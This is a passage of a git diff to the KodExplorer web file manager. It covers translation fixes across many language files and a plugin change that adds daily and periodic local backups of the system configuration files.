KODExplorer - это веб-интерфейс с открытым исходным кодом, созданный для управления онлайн документами и редактирования кода. В нём использован классический оконный интерфейс, как у Windows. Он имеет набор онлайн инструментов для предварительного просмотра, редактирования, выгрузки, скачивания и распаковывания файлов, онлайн воспроизведения музыки. Вы можете работать прямо в браузере, смотреть код, а также напрямую разворачивать свой веб-сайт. Это удобно, быстро и безопасно.

—Концепция дизайна—

KODExplorer наследует классические традиции и следует за инновациями, чтобы предоставить пользователям удобный, безопасный и простой в использовании онлайн-инструмент управления облаком.

@@ -15,22 +14,22 @@
Особенности

Полное управление документами, мощный онлайн редактор файлов

-

Где бы вы ни находились, вы сможете управлять своими файлами, писать код онлайн, и в это время слушать музыку, как будто это все находится на локальном компьютере!

+

Где бы вы ни находились, вы сможете управлять своими файлами, писать код онлайн, и в это время слушать музыку, как будто всё это находится на локальном компьютере!

Всё как в Windows: контекстное меню, drag-and-drop, рабочий стол и поиск файлов…

-

Выбор, выделяя указателем мыши, перемещение или загрузка с помощью drag-and-drop, онлайн-редактор, видео-плеер, упаковка и распаковка файлов.

+

Выбор, выделяя указателем мыши, перемещение или загрузка с помощью drag-and-drop, онлайн-редактор, видео-плеер, упаковка и распаковка архивов.

Бесшовная интеграция всех частей; диалоговые окна, многофункциональный диспетчер задач и другие функции.

-

Онлайн редактор поддерживает множество синтаксисов кода, такие как HTML,CSS,JS, а также многие-многие другие!

+

Онлайн редактор поддерживает множество синтаксисов кода, такие как HTML, CSS, JS, а также многие-многие другие!

Идеально поддерживает китайский язык... А также русский! -Примечание переводчика

Технологии с открытым исходным кодом
-

1.Jquery:jquery(plugin:Hotkeys.ztree.contentmenu).js Быстрая, маленькая, и богатая функциональностью JavaScript библиотека. Она реализует такие вещи в HTML, как обработку событий, анимацию, и Ajax, используя простое API, которое работает с множеством браузеров.

-

2.ArtDialog: Графический интерфейс диалогов на javascript, который красив и прост в работе с javascript эффектами. Модуль artDialog в Drupal основан как раз на нём и помогает разрабочикам drupal в своих проектах.

-

3.Ztree: Мощный и быстрый плагин jQuery создаёт многофункциональные деревья папок с прекрасной производиельностью и гибкой настройкой.

-

4.codemirror: Универсальный текстовый редактор написанный на JavaScript для браузера. Он создан специально для редактирования кода. В этом редакторе еть очень много различных языков программирования, о также он имеет много различных функций для редактирования.

-

5.ZenCoding: Плагин редактора для быстрой разработки и редактирования HTML, XML, XSL и других структурных форматов кода. Ядро этого плагина - инструмент, который позволяет вставлять CSS селекторы в HTML код.

-

6.less: CSS предпроцессор, котрый наследует язык CSS, и добавляет туда переменные, функции и много других возможностей, которые сделают CSS более понятным, кастомизированным и расширяемым.

-

7.SWFUpload: JavaScript библиотека, использующая функции Flash Player для выгрузки файлов. Это позволяет встать выгрузкам на новый уровень с такими функциями, как выбор нескольких файлов, процесс загрузки и отображения размера файла на клиентской стороне.

-

8.CMP4: Очень хороший проигрыватель на flash, поддерживающий потоковые файлы и видео. Также имеет темы и гибкие настройки. Плэйлист загружается из XML, MMS потокового воспроизведения и поддерживает RSTP.

+

1. Jquery:jquery(plugin:Hotkeys.ztree.contentmenu).js Быстрая, маленькая, и богатая функциональностью JavaScript библиотека. Она реализует такие вещи в HTML, как обработку событий, анимацию, и Ajax, используя простое API, которое работает с множеством браузеров.

+

2. ArtDialog: Графический интерфейс диалогов на javascript, который красив и прост в работе с javascript эффектами. Модуль artDialog в Drupal основан как раз на нём и помогает разрабочикам drupal в своих проектах.

+

3. Ztree: Мощный и быстрый плагин jQuery создаёт многофункциональные деревья папок с прекрасной производительностью и гибкой настройкой.

+

4. Codemirror: Универсальный текстовый редактор написанный на JavaScript для браузера. Он создан специально для редактирования кода. Этот редактор поддерживает огромное количество различных языков программирования, а также он имеет много различных функций для редактирования.

+

5. Emmet (ZenCoding): Плагин редактора для быстрой разработки и редактирования HTML, XML, XSL и других структурных форматов кода. Ядро этого плагина - инструмент, который позволяет вставлять CSS селекторы в HTML код.

+

6. Less: CSS предпроцессор, котрый наследует язык CSS, и добавляет туда переменные, функции и много других возможностей, которые сделают CSS более понятным, кастомизированным и расширяемым.

+

7. SWFUpload: JavaScript библиотека, использующая функции Flash Player для выгрузки файлов. Это позволяет встать выгрузкам на новый уровень с такими функциями, как выбор нескольких файлов, процесс загрузки и отображения размера файла на клиентской стороне.

+

8. CMP4: Очень хороший проигрыватель на flash, поддерживающий потоковые файлы и видео. Также имеет темы и гибкие настройки. Плэйлист загружается из XML, MMS потокового воспроизведения и поддерживает RSTP.

\ No newline at end of file diff --git a/config/i18n/ru/edit.html b/config/i18n/ru/edit.html index 60b191e..2a7f0a9 100755 --- a/config/i18n/ru/edit.html +++ b/config/i18n/ru/edit.html @@ -7,7 +7,7 @@

Редактирование рядом с курсором, редактирование блоков.

Управление блоками: свёртывание и развёртывание; перенос слов

Система вкладок; вы можете упорядочить вкладки перетаскиванием

-

Управление несколькими документами;поиск и замена; история;

+

Управление несколькими документами; поиск и замена; история;

Автозавершение [ ], { }, ( ), " ", ' '

Онлайн предпросмотр кода в реальном времени, вы влюбитесь в интернет-программирование!

Поддержка Emmet(ZenCoding)

@@ -16,9 +16,9 @@

150 видов подсветки кода

Подсказки: html, JavaScript, css, less, sass, scss

-

Веб разработка: php, perl, python, ruby, elang, go ...

-

Традиционные языки: java, c, c ++, c #, actionScript, VBScript ...

-

Другое: markdown, shell, sql, lua, xml, yaml ...

+

Веб-разработка: php, perl, python, ruby, elang, go...

+

Традиционные языки: java, c, c ++, c #, actionScript, VBScript...

+

Другое: markdown, shell, sql, lua, xml, yaml...

@@ -37,8 +37,7 @@ Win+Alt+-1 - Свернуть все Win+Alt+Shift+-1 - Развернуть все ESC - Выход [Запрос сохранения файлов, если те не были сохранены] - Ctrl+Shift+s - Предпросмотр - Ctrl+Shift+е - Функция показать и закрыть(?) + Ctrl+Shift+S - Предпросмотр
Выделение текста: 
  Перетаскивание мышки - Простое выделение 
diff --git a/config/i18n/ru/help.html b/config/i18n/ru/help.html
index 846629b..68dae83 100755
--- a/config/i18n/ru/help.html
+++ b/config/i18n/ru/help.html
@@ -1,10 +1,10 @@
 
Управление файлами

Выбор файлов: shift и сtrl для выделения нескольких файлов, выделение мышью, клавишами вверх, вниз, home и end.

-

Работа с файлами: После выбора файла, вы сможете копировать, вырезать, удалять, просматривать свойства, переименовывать, просматривать и многое другое...

+

Работа с файлами: После выбора файла, вы сможете копировать, вырезать, удалять, просматривать свойства, переименовывать, просматривать и многое другое...

Загрузка файлов: Загружайте несколько файлов сразу; загрузка перетаскиванием благодаря html5 (просто перетащите файлы в окно загрузки или папку)

Контекстное меню по правой кнопке мыши: работает с файлами, папками, деревом каталогов, рабочим столом, ярлыками...
- (Выбрать всё - Копировать - Вырезать - Вставить - Удалить - Переименовать, например...)

+ (Выбрать всё - Копировать - Вырезать - Вставить - Удалить - Переименовать, например)

Файловый менеджер: несколько видов просмотра(значки, список, таблица), дважды щелкните для доступа во вложенные папки, осуществляйте навигацию в адресной строке, история навигации по папкам (кнопки вперед и назад)

Поддержка перетаскивания: Зажмите левую кнопку мыши и перенесите файл в требуемое место.

Горячие клавиши: delete для удаления, Ctrl+A для выделения всех файлов, Ctrl+C, для копирования, Ctrl+X для вырезки.

@@ -14,22 +14,22 @@

Предварительный просмотр файлов: просматривайте содержимое текстовых файлов для их редактирования; предварительный просмотр HTML, SWF-файлов.

Предварительный просмотр картинок: автоматическая генерация миниатюр, слайд-шоу изображений.

Воспроизведение аудио: воспроизводите музыку онлайн. Поддерживаются форматы MP3, WMA, MID, AAC, WAV, MP4.

-

Воспроизведение видео: онлайн воспроизведение видео, поддерживаемые форматы: MP4, FLV, F4V, 3gp

-

Документы Office: предварительный просмотр доккументов онлайн. Поддерживаемые форматы: DOC, DOCX, PPT, PPTX, XLS, XLSX

+

Воспроизведение видео: онлайн воспроизведение видео, поддерживаемые форматы: MP4, FLV, F4V, 3gp.

+

Документы Office: предварительный просмотр доккументов онлайн. Поддерживаемые форматы: DOC, DOCX, PPT, PPTX, XLS, XLSX.

Горячие клавиши
-

Enter - Открыть

-

Ctrl+A - Выделить все

+

Enter - Открыть

+

Ctrl+A - Выделить все

Ctrl+C - Копировать

-

Ctrl+V - Вставить

-

Ctrl+X - Вырезать

+

Ctrl+V - Вставить

+

Ctrl+X - Вырезать

Ctrl+F - Поиск в текущем каталоге

-

Alt+N - Новый файл

-

Alt+M - Новая папка

-

Delete - Удалить выбранный

+

Alt+N - Новый файл

+

Alt+M - Новая папка

+

Delete - Удалить выбранный

Backspace - Назад

-

Ctrl+Backspace - Вперед

-

F2 - Переименовать выбранный файл(папку)

+

Ctrl+Backspace - Вперед

+

F2 - Переименовать выбранный файл(папку)

Home/End/стрелки - Выбор файлов и навигация

\ No newline at end of file diff --git a/config/i18n/ru/main.php b/config/i18n/ru/main.php index 3b191b5..f87b8b6 100755 --- a/config/i18n/ru/main.php +++ b/config/i18n/ru/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "пробовать", "unknow_file_download" => "Скачать файл", "unknow_plugin_search" => "установлен поиск связанных приложений", - "unknow_file_office" => "офис предварительного просмотра, kodcloud необходимости быть развернуты за пределами сети

детали>", "config_save_error_auth" => "Не удалось сохранить конфигурацию, администратор запретил эту привилегию!", "config_save_error_file" => "Ошибка, файл недоступен для записи!", "beautify_code" => "Код Formatter", @@ -281,7 +280,7 @@ return array( "forget_password" => "Забыли пароль", "forget_password_tips" => "Забыли пароль администратора:
Пожалуйста , войдите сервер удалить ./data/system/install.lock сброса;

Non-администратора Забыли пароль:
Пожалуйста, обратитесь к администратору, чтобы сбросить!", "copyright_desc" => "Kodexplorer является высоко оценен система управления веб-документ, вы можете использовать его для внутреннего управления документами или совместно, могут также использоваться на сервере управления сайтом, заменить Ftp, даже webIDE непосредственно в интерактивном режиме разработки. Вы также можете запрограммировать второе развитие, чтобы интегрировать это в существующие системы.", - "copyright_contact" => "Санкционировать или подгонять, пожалуйста , свяжитесь с QQ: 3532208565 проблема Обратная связь", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "возвращение", "PluginReadme" => "описание", "PluginResetConfig" => "Восстановить настройки по умолчанию", + "PluginInstallSelf" => "Ручная установка", "Plugin.config.auth" => "права доступа", "Plugin.config.authDesc" => "Все доступные настройки, или указать пользователей, группы пользователей, группы прав можно использовать", "Plugin.config.authAll" => "держатель", diff --git a/config/i18n/si/main.php b/config/i18n/si/main.php index 9cb45a4..1778c30 100755 --- a/config/i18n/si/main.php +++ b/config/i18n/si/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "උත්සාහ කරන්න", "unknow_file_download" => "ගොනුව බාගත", "unknow_plugin_search" => "සොයන්න සම්බන්ධ අයදුම්පත් ස්ථාපනය", - "unknow_file_office" => "කාර්යාලය පෙරදසුනෙහි, kodcloud ජාලය

විස්තර>", "config_save_error_auth" => "වින්යාස බේරා ගැනීමට අපොහොසත් විය, පරිපාලක වරප්රසාද තහනම්!", "config_save_error_file" => "දෝෂය, ගොනුව, ලිවිය-හැකි ගොනුවක් නොවේ!", "beautify_code" => "කේතය හැඩසවිගන්වනය", @@ -281,7 +280,7 @@ return array( "forget_password" => "ඔබගේ මුර පදය අමතකද", "forget_password_tips" => "අමතකද පරිපාලක මුරපදය:
සේවාදායකය නැවත සකස් ./data/system/install.lock මකා ලොග් වන්න;

නොවන පරිපාලක මුරපදය අමතකද:
නැවත සකස් කිරීමට පරිපාලක සම්බන්ධ කරන්න!", "copyright_desc" => "Kodexplorer වූ කීර්තිමත්ම වෙබ් ලේඛන කළමනාකරණ පද්ධතිය, ඔබ එය අභ්යන්තර ලේඛනයක් කළමනාකරණය සඳහා, පවා webIDE සෘජුවම සංවර්ධනය භාවිතා කළ හැකි හෝ දායකත්වය, වෙබ් අඩවිය කළමනාකරණ සේවාදායකය මත භාවිතා කල හැක, FTP වෙනුවට. ඔබ ද ඔබගේ දැනට පවතින පද්ධති තුළට මෙම ඒකාබද්ධ කිරීමට දෙවැනි සංවර්ධන වැඩසටහන හැක.", - "copyright_contact" => ": බලය හෝ සකසන ලද, QQ අමතන්න 3532208565 ප්රශ්නය ඔබෙන් ලැබෙන ප්රයෝජනාත්මක ප්රතිචාරය", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "කතුහිමිකම ©kodcloud.comසියලු හිමිකම් ඇවිරිණි.", "copyright_pre" => "KodExplorer විසින් තල්ලු", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "ආපසු", "PluginReadme" => "විස්තරය", "PluginResetConfig" => "පෙරනිමි සැකසුම් නැවත ස්ථාපනය කරන්න", + "PluginInstallSelf" => "ශ්රමික ස්ථාපනය", "Plugin.config.auth" => "අවසර", "Plugin.config.authDesc" => "ලබා ගත හැකි සැකසුම් සියලු, හෝ පරිශීලකයන්, පරිශීලක කණ්ඩායම්, අයිතිවාසිකම් කණ්ඩායම් භාවිතා කළ හැකි නියම", "Plugin.config.authAll" => "දරන්නා", diff --git a/config/i18n/sk/main.php b/config/i18n/sk/main.php index 767a74e..b0f587a 100755 Binary files a/config/i18n/sk/main.php and b/config/i18n/sk/main.php differ diff --git a/config/i18n/sl/main.php b/config/i18n/sl/main.php index 49c9aef..f5dadda 100755 Binary files a/config/i18n/sl/main.php and b/config/i18n/sl/main.php differ diff --git a/config/i18n/sr/main.php b/config/i18n/sr/main.php index 220a04f..3c0fec8 100755 --- a/config/i18n/sr/main.php +++ b/config/i18n/sr/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "пробати", "unknow_file_download" => "Преузмите датотеку", "unknow_plugin_search" => "апликације претраге везане за инсталиране", - "unknow_file_office" => "канцеларија преглед, кодекплорер морати да буде примењен ван мреже

детаљи>", "config_save_error_auth" => "Није успела да сачува конфигурацију, администратор забранио ту привилегију!", "config_save_error_file" => "Грешка, филе не може писати!", "beautify_code" => "kod форматирање", @@ -281,7 +280,7 @@ return array( "forget_password" => "Заборавили сте лозинку", "forget_password_tips" => "Заборавио Администратор Пассворд:
Молимо вас пријавите сервер обрисати ./дата/систем/инсталл.лоцк ресет;

Нон-администратор Форгот Пассворд:
Контактирајте администратора за ресет!", "copyright_desc" => "Кодекплорер је високо признање систем за управљање веб документ, можете га користити за унутрашњу управљање документима или заједнички, могу се користити и на серверу за управљање сајт, заменити ФТП-а, чак и вебИДЕ онлајн развој. Такође можете програмирати други развој да се интегрише ово у постојеће системе.", - "copyright_contact" => "Одобрити или прилагођено, обратите КК: 3532208565 проблем Феедбацк", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "КодЕкплорер", @@ -730,6 +729,7 @@ return array( "PluginBack" => "повратак", "PluginReadme" => "опис", "PluginResetConfig" => "Вратите подразумеване поставке", + "PluginInstallSelf" => "Ручна инсталација", "Plugin.config.auth" => "Дозволе", "Plugin.config.authDesc" => "Све од доступних подешавања, или одређују корисници, корисничке групе, групе за људска права могу користити", "Plugin.config.authAll" => "ималац", diff --git a/config/i18n/sv/main.php b/config/i18n/sv/main.php index 0ba043b..2ab193a 100755 Binary files a/config/i18n/sv/main.php and b/config/i18n/sv/main.php differ diff --git a/config/i18n/ta/main.php b/config/i18n/ta/main.php index ae386de..57256b9 100755 --- a/config/i18n/ta/main.php +++ b/config/i18n/ta/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "முயற்சி", "unknow_file_download" => "கோப்பை பதிவிறக்க", "unknow_plugin_search" => "தேடல் தொடர்பான பயன்பாடுகள் நிறுவப்பட்ட", - "unknow_file_office" => "அலுவலக முன்னோட்ட, kodcloud தேவை நெட்வொர்க் வெளியே நிறுத்தப்பட்டுள்ளன வேண்டும்

விவரங்கள்>", "config_save_error_auth" => "கட்டமைப்பு சேமிக்க தவறியது, நிர்வாகி, இந்த சலுகை தடை!", "config_save_error_file" => "பிழை, எழுத முடியாது தாக்கல்!", "beautify_code" => "குறியீடு Formatter", @@ -281,7 +280,7 @@ return array( "forget_password" => "உங்கள் கடவுச்சொல்லை மறந்து விட்டீர்களா", "forget_password_tips" => "நிர்வாகி கடவுச்சொல் மறந்துவிட்டதா:
சர்வர் தயவு செய்து புகுபதிகை செய்க ./data/system/install.lock மீட்டமைக்க அழித்தல்;

நிர்வாகி அல்லாத கடவுச்சொல் மறந்து விட்டீர்களா:
மீட்டமைக்க நிர்வாகியைத் தொடர்பு கொள்ளவும்!", "copyright_desc" => "Kodexplorer நீங்கள் அதை உள் ஆவணம் மேலாண்மை அல்லது பகிர்வு, மேலும் தளத்தில் மேலாண்மை சர்வரில் பயன்படுத்த முடியும் கூட webIDE நேரடியாக ஆன்லைன் வளர்ச்சி என, பயன்படுத்த முடியும் Ftp பதிலாக, ஒரு மிகவும் பாராட்டப்பட்ட வலை ஆவணம் மேலாண்மை அமைப்பு உள்ளது. நீங்கள் உங்கள் இருக்கும் அமைப்புகள் இந்த ஒருங்கிணைக்க இரண்டாவது வளர்ச்சி நிரல் முடியும்.", - "copyright_contact" => ": அங்கீகரி அல்லது அமைத்துக்கொள்ள, QQ, தொடர்பு கொள்ளவும் 3532208565 பிரச்சனை கருத்து", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "திரும்ப", "PluginReadme" => "விளக்கம்", "PluginResetConfig" => "இயல்புநிலை அமைப்புகளை மீட்டமைக்கவும்", + "PluginInstallSelf" => "கையேடு நிறுவல்", "Plugin.config.auth" => "அனுமதிகள்", "Plugin.config.authDesc" => "கிடைக்க அமைப்புகளை அனைத்தும், அல்லது குறிப்பிட பயனர்கள், பயனர் குழுக்கள், உரிமைகள் குழுக்கள் பயன்படுத்த முடியும்", "Plugin.config.authAll" => "ஹோல்டர்", diff --git a/config/i18n/th/main.php b/config/i18n/th/main.php index dd50103..84f737e 100755 --- a/config/i18n/th/main.php +++ b/config/i18n/th/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "ความพยายาม", "unknow_file_download" => "ดาวน์โหลดไฟล์", "unknow_plugin_search" => "การใช้งานการค้นหาที่เกี่ยวข้องกับการติดตั้ง", - "unknow_file_office" => "ภาพตัวอย่างสำนักงานจำเป็น kodcloud ที่จะใช้งานนอกเครือข่าย

รายละเอียด>", "config_save_error_auth" => "ล้มเหลวในการบันทึกการตั้งค่าผู้ดูแลระบบห้ามสิทธิพิเศษนี้!", "config_save_error_file" => "ข้อผิดพลาดไฟล์ไม่สามารถเขียนได้!", "beautify_code" => "รหัสฟอร์แมต", @@ -281,7 +280,7 @@ return array( "forget_password" => "ลืมรหัสผ่านของคุณ", "forget_password_tips" => "ลืมรหัสผ่านผู้ดูแลระบบ:
กรุณาเข้าสู่ระบบเซิร์ฟเวอร์ลบ ./data/system/install.lock รีเซ็ต;

ไม่ใช่ผู้ดูแลลืมรหัสผ่าน:
กรุณาติดต่อผู้ดูแลระบบเพื่อรีเซ็ต!", "copyright_desc" => "Kodexplorer เป็นระบบการจัดการเอกสารเว็บสะเทือนใจคุณสามารถใช้มันสำหรับการจัดการเอกสารภายในหรือใช้ร่วมกันนอกจากนี้ยังสามารถนำมาใช้ในการจัดการเซิร์ฟเวอร์เว็บไซต์แทนที่ FTP, แม้ในขณะที่การพัฒนา webIDE ออนไลน์ได้โดยตรง นอกจากนี้คุณยังสามารถตั้งโปรแกรมการพัฒนาที่สองนี้จะบูรณาการเข้ากับระบบที่มีอยู่", - "copyright_contact" => "อนุญาตหรือที่กำหนดเองกรุณาติดต่อ QQ: 3532208565 ปัญหาข้อเสนอแนะ", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "กลับ", "PluginReadme" => "ลักษณะ", "PluginResetConfig" => "เรียกคืนการตั้งค่าเริ่มต้น", + "PluginInstallSelf" => "ติดตั้งด้วยตนเอง", "Plugin.config.auth" => "สิทธิ์", "Plugin.config.authDesc" => "ทั้งหมดของการตั้งค่าที่มีอยู่หรือระบุผู้ใช้กลุ่มผู้ใช้กลุ่มสิทธิสามารถใช้", "Plugin.config.authAll" => "เจ้าของ", diff --git a/config/i18n/tr/main.php b/config/i18n/tr/main.php index ec2558b..234649f 100755 Binary files a/config/i18n/tr/main.php and b/config/i18n/tr/main.php differ diff --git a/config/i18n/uk/main.php b/config/i18n/uk/main.php index 84129e0..2668ff6 100755 --- a/config/i18n/uk/main.php +++ b/config/i18n/uk/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "пробувати", "unknow_file_download" => "завантажити файл", "unknow_plugin_search" => "встановлений пошук пов'язаних додатків", - "unknow_file_office" => "офіс попереднього перегляду, kodcloud необхідності бути розгорнуті за межами мережі

деталі>", "config_save_error_auth" => "Неможливо зберегти конфігурацію, адміністрація відключила можливість використовувати цей привілей!", "config_save_error_file" => "Помилка, файл недоступний для запису!", "beautify_code" => "код Formatter", @@ -281,7 +280,7 @@ return array( "forget_password" => "Забули пароль", "forget_password_tips" => "Забули пароль адміністратора:
Будь ласка , увійдіть сервер видалити ./data/system/install.lock скидання;

Non-адміністратора Забули пароль:
Будь ласка, зверніться до адміністратора, щоб скинути!", "copyright_desc" => "Kodexplorer є високо оцінений система управління веб-документ, ви можете використовувати його для внутрішнього управління документами або спільно, можуть також використовуватися на сервері управління сайтом, замінити Ftp, навіть webIDE безпосередньо в інтерактивному режимі розробки. Ви також можете запрограмувати друге розвиток, щоб інтегрувати це в існуючі системи.", - "copyright_contact" => "Санкціонувати або підганяти, будь ласка , зв'яжіться з QQ: 3532208565 проблема Зворотній зв'язок", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "повернення", "PluginReadme" => "опис", "PluginResetConfig" => "Відновити налаштування за замовчуванням", + "PluginInstallSelf" => "Ручна установка", "Plugin.config.auth" => "права доступу", "Plugin.config.authDesc" => "Всі доступні настройки, або вказати користувачів, групи користувачів, групи прав можна використовувати", "Plugin.config.authAll" => "держатель", diff --git a/config/i18n/uz/main.php b/config/i18n/uz/main.php index b594742..ca0e274 100755 Binary files a/config/i18n/uz/main.php and b/config/i18n/uz/main.php differ diff --git a/config/i18n/vi/main.php b/config/i18n/vi/main.php index 1cd7b6e..3407e41 100755 --- a/config/i18n/vi/main.php +++ b/config/i18n/vi/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "thử", "unknow_file_download" => "Tải file", "unknow_plugin_search" => "ứng dụng tìm kiếm liên quan đến cài đặt", - "unknow_file_office" => "xem trước văn phòng, cần kodcloud được triển khai bên ngoài mạng

chi tiết>", "config_save_error_auth" => "Không thể lưu cấu hình, quản trị cấm đặc quyền này!", "config_save_error_file" => "Lỗi, tập tin không thể ghi!", "beautify_code" => "Mã Formatter", @@ -281,7 +280,7 @@ return array( "forget_password" => "Quên mật khẩu của bạn", "forget_password_tips" => "Quên Administrator Password:
Hãy đăng nhập máy chủ xóa ./data/system/install.lock thiết lập lại;

Non-quản trị viên Quên mật khẩu:
Hãy liên hệ với người quản trị để thiết lập lại!", "copyright_desc" => "Kodexplorer là một hệ thống quản lý tài liệu web rất hoan nghênh, bạn có thể sử dụng nó để quản lý tài liệu nội bộ hoặc chia sẻ, cũng có thể được sử dụng trên các máy chủ quản lý trang web, thay thế Ftp, thậm chí như webIDE phát triển trực tiếp trực tuyến. Bạn cũng có thể lập trình phát triển thứ hai để hội nhập này vào các hệ thống hiện tại của bạn.", - "copyright_contact" => "Phép hoặc tùy chỉnh, xin vui lòng liên hệ với QQ: 3532208565 vấn đề Phản hồi", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "trả lại", "PluginReadme" => "miêu tả", "PluginResetConfig" => "Khôi phục cài đặt mặc định", + "PluginInstallSelf" => "Cài đặt thủ công", "Plugin.config.auth" => "Quyền", "Plugin.config.authDesc" => "Tất cả các thiết lập có sẵn, hoặc chỉ định người dùng, nhóm người dùng, các nhóm nhân quyền có thể sử dụng", "Plugin.config.authAll" => "người nắm", diff --git a/config/i18n/zh-CN/main.php b/config/i18n/zh-CN/main.php index c8d6a85..a91c936 100755 --- a/config/i18n/zh-CN/main.php +++ b/config/i18n/zh-CN/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "尝试", "unknow_file_download" => "下载该文件", "unknow_plugin_search" => "搜索相关的应用安装", - "unknow_file_office" => "office预览,kodcloud需要部署在外网

详情>", "config_save_error_auth" => "配置保存失败,管理员禁止了此权限!", "config_save_error_file" => "错误,文件没有写权限!", "beautify_code" => "代码格式化", @@ -281,7 +280,7 @@ return array( "forget_password" => "忘记密码", "forget_password_tips" => "管理员忘记密码:
请登陆服务器删除./data/system/install.lock后重置;

非管理员忘记密码:
请联系管理员重置!", "copyright_desc" => "Kodexplorer是一款备受好评的web文档管理系统,你可以用它来做内部文档管理或共享、也可以用来管理服务器上的网站,取代Ftp,甚至可以当作webIDE直接在线开发。同时你也可以将此程序二次开发整合到你现有的系统。", - "copyright_contact" => "授权或定制请联系QQ:3532208565问题反馈", + "copyright_contact" => "授权或定制请联系QQ:3532208565问题反馈", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "返回", "PluginReadme" => "描述", "PluginResetConfig" => "恢复默认设置", + "PluginInstallSelf" => "手动安装", "Plugin.config.auth" => "使用权限", "Plugin.config.authDesc" => "设置所有人可用,或者指定用户、用户组、权限组可以使用", "Plugin.config.authAll" => "所有人", diff --git a/config/i18n/zh-TW/main.php b/config/i18n/zh-TW/main.php index fa33f24..6614079 100755 --- a/config/i18n/zh-TW/main.php +++ b/config/i18n/zh-TW/main.php @@ -9,7 +9,7 @@ return array( "setting_user_sound_open" => "開啟音效", "setting_user_animate_open" => "開啟動畫", "recycle_open_if" => "開啟垃圾筒", - "recycle_open" => "開啟", + "recycle_open" => "开启", "setting_user_recycle_desc" => "關閉後刪除會直接物理刪除,建議開啟", "setting_user_animate_desc" => "窗口打開等動畫,操作不流暢時可以考慮關閉", "setting_user_sound_desc" => "打開文件、刪除文件、清空回收站等操作音效", @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "嘗試", "unknow_file_download" => "下載該文件", "unknow_plugin_search" => "搜索相關的應用安裝", - "unknow_file_office" => "Office預覽,此程式需要部署在外部網路

详情>", "config_save_error_auth" => "設定儲存失败,管理员禁止了此权限!", "config_save_error_file" => "錯誤,文件沒有寫權限!", "beautify_code" => "代碼格式化", @@ -281,7 +280,7 @@ return array( "forget_password" => "忘記密碼", "forget_password_tips" => "管理員忘記密碼:
請登陸服務器刪除./data/system/install.lock後重置;

非管理員忘記密碼:
請聯繫管理員重置!", "copyright_desc" => "Kodexplorer是一款備受好評的web文檔管理系統,你可以用它來做內部文檔管理或共享、也可以用來管理服務器上的網站,取代Ftp,甚至可以當作webIDE直接在線開發。同時你也可以將此程序二次開發整合到你現有的系統。", - "copyright_contact" => "授權或定制請聯繫QQ: 3532208565 問題反饋", + "copyright_contact" => "授權或定制請聯繫QQ:3532208565問題反饋", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "返回", "PluginReadme" => "描述", "PluginResetConfig" => "恢復默認設置", + "PluginInstallSelf" => "手動安裝", "Plugin.config.auth" => "使用權限", "Plugin.config.authDesc" => "設置所有人可用,或者指定用戶、用戶組、權限組可以使用", "Plugin.config.authAll" => "所有人", diff --git a/config/version.php b/config/version.php index d66c7f1..b90820d 100755 --- a/config/version.php +++ b/config/version.php @@ -1,2 +1,2 @@ hookRegiest(array( - 'user.commonJs.insert' => 'toolsCommonPlugin.echoJs' + 'user.commonJs.insert' => 'toolsCommonPlugin.echoJs' )); } public function echoJs($st,$act){ + $this->systemBackup(); $this->echoFile('static/main.js'); } + public function systemBackup(){ + $system = DATA_PATH.'system/'; + $bakcupLast = $system.'backup/last/'; + $backupLastDay = $system.'backup/day/'.date('Ymd',time()).'/'; + + //每天覆盖备份一次 + if(!@file_exists($bakcupLast)){ + mk_dir($bakcupLast); + $this->backupTo($bakcupLast); + } + $lastTime = @filemtime($bakcupLast.'/system_member.php'); + if(time() - $lastTime > 60*60*24){ + $this->backupTo($bakcupLast); + } + + //每N天备份一次; + $backupRepeat = 5; + if(intval(date('d',time())) % $backupRepeat == 0){ + if(@file_exists($backupLastDay)){ + return; + } + mk_dir($backupLastDay); + $this->backupTo($backupLastDay); + } + } + private function backupTo($folder){ + $system = DATA_PATH.'system/'; + $backFile = array( + 'apps.php', + 'system_group.php', + 'system_member.php', + 'system_role.php', + 'system_role_group.php', + 'system_setting.php', + 'desktop_app.php' + ); + foreach ($backFile as $file) { + if(file_exists($folder.$file)){ + @unlink($folder.$file); + } + @copy($system.$file,$folder.$file); + } + } /** * 